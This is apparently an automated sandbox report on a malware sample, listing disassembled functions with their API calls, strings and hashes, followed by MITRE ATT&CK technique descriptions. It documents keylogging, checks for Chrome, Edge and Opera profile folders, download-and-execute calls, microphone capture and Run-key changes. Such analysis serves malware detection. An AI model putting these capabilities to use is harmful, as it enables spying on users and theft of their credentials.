Function 0044B731 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
GetLastError.KERNEL32 ref: 0044B804

Strings

PkGNG, xrefs: 0044B733

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: PkGNG
API String ID: 442123175-263838557
Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68

Function 0044B652 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
GetLastError.KERNEL32 ref: 0044B716

Strings

PkGNG, xrefs: 0044B654

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: PkGNG
API String ID: 442123175-263838557
Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64

Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087

Strings

KeepAlive | Enabled | Timeout: , xrefs: 0040501F

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
Opcode Fuzzy Hash: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF

Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00416640
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: DownloadFileSleep
String ID: !D@
API String ID: 1931167962-604454484
Opcode ID: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
Opcode Fuzzy Hash: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A

Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C

Strings

alarm.wav, xrefs: 0041AD27
hYG, xrefs: 0041AD46

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: alarm.wav$hYG
API String ID: 1174141254-2782910960
Opcode ID: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
Opcode Fuzzy Hash: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F

Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

CloseHandle.KERNEL32(?), ref: 0040B0B4
UnhookWindowsHookEx.USER32 ref: 0040B0C7

Strings

Online Keylogger Stopped, xrefs: 0040B061, 0040B069, 0040B090

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE

Function 00448BB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24

Strings

PkGNG, xrefs: 00448BB5
LCMapStringEx, xrefs: 00448BCE

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: String
String ID: LCMapStringEx$PkGNG
API String ID: 2568140703-1065776982
Opcode ID: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
Opcode Fuzzy Hash: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99

Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F

Strings

XMG, xrefs: 004017F8

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: XMG
API String ID: 2315374483-813777761
Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8

Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32

Strings

IsValidLocaleName, xrefs: 00448AF7, 00448B01
JD, xrefs: 00448B29, 00448B16

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$JD
API String ID: 1901932003-2234456777
Opcode ID: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
Opcode Fuzzy Hash: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E

Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6

Strings

\AppData\Local\Google\Chrome\, xrefs: 0040C4E0
UserProfile, xrefs: 0040C4CA

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE

Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559

Strings

\AppData\Local\Microsoft\Edge\, xrefs: 0040C543
UserProfile, xrefs: 0040C52D

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE

Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC

Strings

AppData, xrefs: 0040C590
\Opera Software\Opera Stable\, xrefs: 0040C5A6

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA

Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040B64B

Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662

Strings

[AltR], xrefs: 0040B681
[AltL], xrefs: 0040B68D

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
String ID: [AltL]$[AltR]
API String ID: 2738857842-2658077756
Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF

Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E

Strings

uD, xrefs: 0044ED05

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID: uD
API String ID: 0-2547262877
Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49

Function 00448957 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996

Strings

PkGNG, xrefs: 00448959
GetSystemTimePreciseAsFileTime, xrefs: 00448972

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime$PkGNG
API String ID: 2086374402-949981407
Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE

Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8

Strings

!D@, xrefs: 00417089
open, xrefs: 004161A2

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: !D@$open
API String ID: 587946157-1586967515
Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A

Function 0045554B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

___initconout.LIBCMT ref: 0045555B

Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30

WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E

Strings

PkGNG, xrefs: 0045554D

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ConsoleCreateFileWrite___initconout
String ID: PkGNG
API String ID: 3087715906-263838557
Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759

Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040B6A5

Strings

[CtrlR], xrefs: 0040B6C2
[CtrlL], xrefs: 0040B6D3

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF

Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 00410F29

Strings

0kG, xrefs: 00410F31
,kG, xrefs: 00410F04

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: ,kG$0kG
API String ID: 1881088180-2015055088
Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D

Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668

Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
GetLastError.KERNEL32 ref: 00440D35
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759

Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
SetLastError.KERNEL32(0000007F), ref: 00411C7A
SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
